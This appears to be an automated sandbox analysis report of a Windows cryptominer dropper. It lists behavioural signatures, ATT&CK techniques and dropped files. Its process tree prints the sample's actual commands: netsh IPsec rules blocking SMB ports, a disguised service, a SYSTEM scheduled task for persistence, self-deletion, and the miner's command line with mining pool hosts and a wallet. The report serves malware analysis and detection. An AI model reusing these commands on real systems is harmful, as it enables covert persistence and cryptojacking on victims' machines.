Analysis

  • max time kernel
    151s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    30-06-2020 12:05

General

  • Target

    618a1e3551560b86454450f3ea580029.exe

  • Size

    584KB

  • MD5

    618a1e3551560b86454450f3ea580029

  • SHA1

    39d86228750d1eebdb78f60b03c3b638acf72d34

  • SHA256

    6edb794a9f28cbd60dcb9fefc0e145f64c9e623b3df235a4a907ca948fd1edb9

  • SHA512

    d5b309a0ff9b07e74c9cee1df37a627193393de7cc0fe079ab606d94b2beac948c8d7d25378de3cf87b00c7227c70fa8e49291d6060a7254e2ce0439a09c2305

Malware Config

Signatures

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Executes dropped EXE 3 IoCs
  • Deletes itself 1 IoCs
  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies service 2 TTPs 152 IoCs
  • Suspicious use of WriteProcessMemory 168 IoCs
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Drops file in Windows directory 66 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe
    "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    PID:1520
    • C:\Users\Admin\AppData\Local\Temp\66545a.exe
      "C:\Users\Admin\AppData\Local\Temp\66545a.exe"
      2⤵
      • Identifies Wine through registry keys
      • Suspicious use of SetWindowsHookEx
      • Loads dropped DLL
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies WinLogon for persistence
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Drops file in Windows directory
      PID:664
      • C:\Windows\cZDUg\tqnkhe.exe
        C:\Windows\cZDUg\tqnkhe.exe
        3⤵
        • Identifies Wine through registry keys
        • Suspicious use of SetWindowsHookEx
        • Loads dropped DLL
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Modifies WinLogon for persistence
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Drops file in Windows directory
        PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=ipsec_ply
            5⤵
            • Modifies service
            PID:924
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=deny_pt
            5⤵
            • Modifies service
            PID:1840
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=allow_pt
            5⤵
            • Modifies service
            PID:1752
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
            5⤵
            • Modifies service
            PID:1804
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
            5⤵
            • Modifies service
            PID:1520
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=deny action=block
            5⤵
            • Modifies service
            PID:832
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=allow action=negotiate
            5⤵
            • Modifies service
            PID:1960
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
            5⤵
            • Modifies service
            PID:300
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
            5⤵
            • Modifies service
            PID:1588
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=ipsec_ply assign=y
            5⤵
            • Modifies service
            PID:984
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Windows\end.bat" "
          4⤵
            PID:692
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=ipsec_ply
              5⤵
              • Modifies service
              PID:1352
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filterlist name=deny_pt
              5⤵
              • Modifies service
              PID:1832
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filterlist name=allow_pt
              5⤵
              • Modifies service
              PID:756
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
              5⤵
              • Modifies service
              PID:1344
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
              5⤵
              • Modifies service
              PID:1608
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=deny action=block
              5⤵
              • Modifies service
              PID:1920
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=allow action=negotiate
              5⤵
              • Modifies service
              PID:1876
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
              5⤵
              • Modifies service
              PID:1796
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
              5⤵
              • Modifies service
              PID:1224
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static set policy name=ipsec_ply assign=y
              5⤵
              • Modifies service
              PID:524
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Windows\end.bat" "
            4⤵
              PID:1468
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add policy name=ipsec_ply
                5⤵
                • Modifies service
                PID:1116
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filterlist name=deny_pt
                5⤵
                • Modifies service
                PID:1864
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filterlist name=allow_pt
                5⤵
                  PID:1224
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
                  5⤵
                  • Modifies service
                  PID:524
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
                  5⤵
                  • Modifies service
                  PID:300
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filteraction name=deny action=block
                  5⤵
                  • Modifies service
                  PID:1376
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filteraction name=allow action=negotiate
                  5⤵
                  • Modifies service
                  PID:1044
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
                  5⤵
                  • Modifies service
                  PID:1804
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
                  5⤵
                  • Modifies service
                  PID:1064
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static set policy name=ipsec_ply assign=y
                  5⤵
                  • Modifies service
                  PID:1628
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Windows\end.bat" "
                4⤵
                  PID:1588
                • C:\Windows\SysWOW64\sc.exe
                  sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
                  4⤵
                    PID:1844
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Windows\cZDUg\qdx.bat" "
                    4⤵
                      PID:1692
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\cZDUg\tqnkhe.exe" /SC ONSTART
                        5⤵
                        • Creates scheduled task(s)
                        PID:1556
                    • C:\Windows\cZDUg\Js.exe
                      "C:\Windows\cZDUg\Js.exe" -o stratum+tcp://rx.monerorx.com:8888 -o stratum+tcp://rx1.monerorx.com:9855 -o ttt.ppxfghdfhdfhfghxmr.com:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1116
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\66545a.exe"
                    3⤵
                      PID:1916
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\618a1e3551560b86454450f3ea580029.exe"
                    2⤵
                    • Deletes itself
                    PID:528

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Execution

                Scheduled Task

                1
                T1053

                Persistence

                Scheduled Task

                1
                T1053

                Winlogon Helper DLL

                1
                T1004

                New Service

                1
                T1050

                Modify Existing Service

                1
                T1031

                Privilege Escalation

                Scheduled Task

                1
                T1053

                New Service

                1
                T1050

                Defense Evasion

                Modify Registry

                2
                T1112

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Temp\66545a.exe
                • C:\Users\Admin\AppData\Local\Temp\66545a.exe
                • C:\Windows\cZDUg\Js.exe
                • C:\Windows\cZDUg\qdx.bat
                • C:\Windows\cZDUg\tqnkhe.exe
                • C:\Windows\cZDUg\tqnkhe.exe
                • C:\Windows\cZDUg\tscl.html
                • C:\Windows\end.bat
                • C:\Windows\end.bat
                • C:\Windows\end.bat
                • \Users\Admin\AppData\Local\Temp\66545a.exe
                • \Users\Admin\AppData\Local\Temp\66545a.exe
                • \Windows\cZDUg\Js.exe
                • \Windows\cZDUg\Js.exe
                • \Windows\cZDUg\tqnkhe.exe
                • \Windows\cZDUg\tqnkhe.exe
                • memory/300-25-0x0000000000000000-mapping.dmp
                • memory/300-40-0x0000000000000000-mapping.dmp
                • memory/524-51-0x0000000000000000-mapping.dmp
                • memory/524-38-0x0000000000000000-mapping.dmp
                • memory/528-4-0x0000000000000000-mapping.dmp
                • memory/664-5-0x0000000005600000-0x0000000005611000-memory.dmp
                  Filesize

                  68KB

                • memory/664-2-0x0000000000000000-mapping.dmp
                • memory/664-6-0x0000000005A10000-0x0000000005A21000-memory.dmp
                  Filesize

                  68KB

                • memory/692-28-0x0000000000000000-mapping.dmp
                • memory/756-36-0x0000000000000000-mapping.dmp
                • memory/832-23-0x0000000000000000-mapping.dmp
                • memory/924-18-0x0000000000000000-mapping.dmp
                • memory/984-29-0x0000000000000000-mapping.dmp
                • memory/1044-44-0x0000000000000000-mapping.dmp
                • memory/1064-48-0x0000000000000000-mapping.dmp
                • memory/1116-33-0x0000000000000000-mapping.dmp
                • memory/1116-59-0x0000000000000000-mapping.dmp
                • memory/1224-37-0x0000000000000000-mapping.dmp
                • memory/1224-49-0x0000000000000000-mapping.dmp
                • memory/1344-39-0x0000000000000000-mapping.dmp
                • memory/1352-32-0x0000000000000000-mapping.dmp
                • memory/1376-43-0x0000000000000000-mapping.dmp
                • memory/1468-30-0x0000000000000000-mapping.dmp
                • memory/1504-16-0x0000000000000000-mapping.dmp
                • memory/1520-22-0x0000000000000000-mapping.dmp
                • memory/1556-56-0x0000000000000000-mapping.dmp
                • memory/1564-14-0x0000000005A00000-0x0000000005A11000-memory.dmp
                  Filesize

                  68KB

                • memory/1564-63-0x00000000087C0000-0x00000000087D1000-memory.dmp
                  Filesize

                  68KB

                • memory/1564-62-0x00000000083B0000-0x00000000083C1000-memory.dmp
                  Filesize

                  68KB

                • memory/1564-10-0x0000000000000000-mapping.dmp
                • memory/1564-13-0x00000000055F0000-0x0000000005601000-memory.dmp
                  Filesize

                  68KB

                • memory/1588-52-0x0000000000000000-mapping.dmp
                • memory/1588-26-0x0000000000000000-mapping.dmp
                • memory/1608-41-0x0000000000000000-mapping.dmp
                • memory/1628-50-0x0000000000000000-mapping.dmp
                • memory/1692-54-0x0000000000000000-mapping.dmp
                • memory/1752-20-0x0000000000000000-mapping.dmp
                • memory/1796-47-0x0000000000000000-mapping.dmp
                • memory/1804-21-0x0000000000000000-mapping.dmp
                • memory/1804-46-0x0000000000000000-mapping.dmp
                • memory/1832-35-0x0000000000000000-mapping.dmp
                • memory/1840-19-0x0000000000000000-mapping.dmp
                • memory/1844-53-0x0000000000000000-mapping.dmp
                • memory/1864-34-0x0000000000000000-mapping.dmp
                • memory/1876-45-0x0000000000000000-mapping.dmp
                • memory/1916-12-0x0000000000000000-mapping.dmp
                • memory/1920-42-0x0000000000000000-mapping.dmp
                • memory/1960-24-0x0000000000000000-mapping.dmp